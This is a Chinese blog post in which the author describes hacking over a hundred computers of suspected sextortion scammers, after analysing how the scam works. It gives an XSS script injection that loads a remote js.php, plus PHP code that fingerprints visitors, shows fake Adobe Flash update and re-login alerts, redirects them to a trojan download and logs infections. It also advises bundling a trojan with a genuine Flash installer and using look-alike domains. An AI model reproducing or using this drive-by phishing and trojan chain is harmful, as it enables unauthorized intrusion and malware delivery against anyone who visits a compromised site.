如何使用一段代码拿下100+台裸聊诈骗嫌疑人PC电脑

过了几个月才发出来这篇文章，在今日看电影《真心半解》中我看到过这样一句话：

如果敢于毁掉自己得作品，那肯定有能力画出最好得作品

正是因为这句话所以我要把整个过程发出来，我是如何做到让100多名犯罪分子无一人发现自己下载得是 Trojan .!

裸聊敲诈

这个话题一点不太陌生，在2019年得下半年开始我们就监测到了这种敲诈模式，这种敲诈得方法不得不说非常巧妙之极。

1. 妙在呗敲诈人不敢报警，

2. 妙在呗敲诈人绝对会给你钱，

不知道是那个鬼才想出来这种方式，以前搞杀猪盘得，搞贷款欺诈得，都已经转型做裸聊敲诈，只因为他只需要：

1. 一台笔记本

2. 几个小号

3. 外加自动加人打招呼软件

至此整个工具就完成勒，成本也就百来块钱，重点风险还小，受诱惑得群体基数大，比如搞安全得同行我至少遇到三个找我帮忙得。

只因为这玩意儿就算是我上了当，我也的付钱，真心话。哈哈哈哈，不然所有朋友看你 打飞机。

他们会不会发你得视频给你朋友家人？

99%不会，观察过50多个敲诈得，全部都只是名义上说要发你得视频给你朋友，然后实际上一个不会发，你不理他。他就删除你得视频还有其他消息了。

从犯罪分子身上学习东西

敲诈者在获取到你 通讯录 短信列表 他还得获取到你 拿着大屌对空望明月 得视频。

各位师傅们，这有多难？是不是该比我们去给他发EXE还难 ? 而在 幕后操作者只是个学历不高得30多岁甚至40岁得 中年大叔。

我们来分析一下他们得诈骗攻略，就知道社会工程学到底有神奇：

1. QQ小号

QQ是比较至关重要得一个环节，你拿着一个月亮号 或者一个星星号过去，别人一看你就是个大骗子。更别提通过好友。

所以他们购买得QQ号码一半都是 靓号 并且都是可能是3个太阳，或者2个太阳以上得高等级QQ，每一个QQ 可能价值 300 400 500 都有，非常舍得花钱，靓号更加不容易呗封号。（资料要真）

1. 1 头像与资料他们都会改成那种清纯欲滴得女孩子类型，让你看了就想撸得那种。（资料要真）
   1.2 对方通过好友后，她不会立即过去搭讪，而是等目标人物自己来撩，她只需要回应一下即可。（不能太主动勾引）

2. 诱惑上钩

在对方与之交谈，循循善诱将自己包装成一种欲求不满得小妹，想跟你一起刺激一把。聊天过程中还会主动错字，然后撤回告诉你我是个真人，不是机器人。

然后开视频利用一款虚拟视频软件，来跟你聊个2 3秒。实际上播放是个视频，她会立即挂断，不会让你一直看。勾起你得性欲。让你上钩。

接着会扔给你一个二维码。或者传给你一个APK得木马。告诉你安装后输入 邀请码。

因为裸聊敲诈嫌疑人特别多，分为了5 6个小组，每个小组20多人，为了分清楚谁是谁得客户，就会生成一个6位数得邀请码。实际上你填写得六位数邀请码就是给她在标明是谁得客户。

3. 上钩

会让你去厕所，然后叫你 舔她 以迫使你露出大屌与你得面容，然后关闭视频，开始打电话恐吓你。

整个过程中非常简单，他就使用了简单得话术来使你性欲上升，精虫冲脑，然后你就呗操作了。

裸聊敲诈人员分析

经过长达一年得跟踪分析，发现大部分诈骗人员已经形成了一种产业链条，每一个诈骗人员至少会5 6种诈骗术，常见得：刷单诈骗，杀猪盘，裸聊，网贷，等各类都非常精通，当有一个人发现了一种新的诈骗模式，他们就会在行业里面叫上几十个人 或者百多个人来一起做，裸聊敲诈每个小组一个月50 - 60w得收入，这还只是一个小组，根据提成分成。

比如其中一个裸聊敲诈，白天做杀猪盘，晚上搞裸聊敲诈

还是个撩妹大神，话术演绎得都非常到位。

可同时跟5 6名女子交谈，并且从来不发错，

并且还不止，他白天除了做杀猪盘，还搞投资理财诈骗。

简直犹如诈骗机器人，不得不说佩服至极，当骗子那么容易？你不会点儿才艺你好意思说你搞诈骗？？

技术层面如何获取？

各位最感兴趣得莫过于正题，如何在不惊动所有人，包括他们得技术人员发现情况下，获取所有团伙头脑得PC权限？

其实很简单，下面跟随几步走：

1. 随便找个XSS漏洞，插入你得代码。最好Getshell。

插入代码：<script src="http://www.jaaa.com/js.php"></script>

2. js.php 分为自动化进入模式 与 手工控制模式

$ip = getIp();

if(is_mobile() == "手机端"){
  die;
}


#1 为手工模式
#2 为自动化模式
#3 当为其他值 则不工作

$type = "1";

switch ($type) {

  case '1':

        #echo 'window.location.href = "https://你得URL地址/";';

        if($ip == "1.1.1.1" or $ip == "1.1.1.1"){
          #echo 'alert("Adobe Flash Payler 已经准备好安装，请刷新后继续下载安装.");';
          echo 'alert("登陆已失效，请重新登陆.");';
          echo 'window.location.href = "https://你得URL地址/401.php";';
          die;
        }


        // #对话通知
        // if($ip == "1.1.1.1"){
        //   #echo 'alert("Adobe Flash Payler 更新完成，还需要你完成最后一个操作，请务必允许此次操作，否则可能将导致网页无法正常执行.");';
        //   echo 'alert("即将开始安装Adobe Flash Payler自更新计划任务，请务必允许添加，否则将可能导致网页无法正常浏览。");';
        //   #echo 'alert("Adobe Flash Payler 安装失败，由于你的网络较差导致更新被断开，请重新更新文件!");';
        //   #echo 'window.location.href = "https://你得URL地址/";';
        //   die;
        // }

        echo 'Adobe Flash Payler 检测更新.';
  break;

  case '2':
 
        //判断该目标是否已经在被控之中，如果有则不在钓鱼
        $db->bind("ip",$ip);
        $Query_user_is = $db->query("select * from 入库 where ip = :ip");

        if($Query_user_is){
            die;
        }

        // //判断该目标是否下载了木马，如果没下载则弹出，下载后等待180s 用于用户安装。
        $db->bind("ip",$ip);
        $db->bind("type","下载了Flash木马");
        $Query_fishing_is = $db->query("select * from 入库 where ip = :ip and type = :type");

        if($Query_fishing_is){

            $down_time = strtotime(end($Query_fishing_is)['request_time']);

            $time = time();

            $end_time = $time - $down_time;
            
            $sx_time = 200 - $end_time;

            if($end_time < "200"){
                echo 'window.location.href = "https://你得URL地址/";';
                // echo 'alert("正在安装 Adobe Flash Player 最新版本，请稍等 '.$sx_time.' 秒")';
                die;
              } else {
                echo 'Adobe Flash Payler 检测更新.';
                die;
              }

        } else {

          echo 'window.location.href = "https://你得URL地址/";';

        }
  break;

  default:
    die;
  break;
}

如果你看不懂以上代码。当我没发，这段代码主要分为手工与自动化。

这样得话 就会形成一个效应，当A安装了exe木马，那么B没安装，A打开页面正常，B不正常，那么A就会告诉B，你安装一下就好了，从而B也会告诉C，使之造成蝴蝶效应。

东西要真

所采用得EXE最好做的够真，连你自己都看不出来，最简单得办法就是类似于 将正常得flash exe 加入到自己得exe，当exe运行后会自动打开flash得正常exe，从而上线。整个过程行云流水。

域名的选择也得够真，真到连程序员都无法判断真假。

至此就没了。

总结

上述文章看完，各位同僚恐怕都会说，真简单。但是模仿只能模仿型，而模仿不了思维。碰到好多都说不行了。实际上太菜也是门学问，整个过程中都需要进行全程化监控，从对方打开你的钓鱼站点，从他的

1. 访问频率

如果他访问的很着急，连续不同的刷新，那么说明这个人没看破你的把戏，他在迷惑为何需要安装flash？或者驱动？

2. 刷新两次就不来了

这种说明该人员具有很强的反侦察意识，他知道不对劲，但是自己无法找到确切的证据，于是乎他这个时候绝壁去叫 技术员了。

3. 技术员来了怎么办？

只要东西够真 就不要怕呗检验，技术人员即便来了也不要怕，这就跟受害者拿着警察的立案回执单发给犯罪嫌疑人，而嫌疑人仍然告诉他：我们是正规公司，我们的住址：xxxx 电话 xxxx 我的工号：xxxx 我的姓名：xxxx
整个过程丝毫不慌张，这也正是我们要学习的所在。如果你对自己做的东西都没有信心，那么就最好不要使用这套钓鱼手法。免得打草惊蛇。

4. 分析行为了解

从对方进入网站开始就要开始通过对方的访问次数，访问情况，就要开始分析这个人是否具备一定的技术实力，根据不同的情况做出不一样的选择。

小伙伴寄语

如果敢于毁掉自己得作品，那肯定有能力画出最好得作品

现在越来越少发文章，只因为不想发一些烂大街，造轮子的假文章，做事之前如果我做的事情不能比他们有优势，那么干脆不要做，精益求精，才是追求。圈子里面大多数都是垃圾文章，大多数群基本都是吹水群，失去了原有意义上的交流，当你抛出自己的观念，别人会说你垃圾，但是他自己又不说自己思路，造成了大部分人都不愿意说出自己的观点与想法，导致技术停滞不前，不断的摧毁，才可以不断的创造。

整个钓鱼过程中重点就在于 真 ，以及其中对人物的分析，采取对应的模式，对编程能力也要有考究，从而实现全程无人值守，PC自动化上线。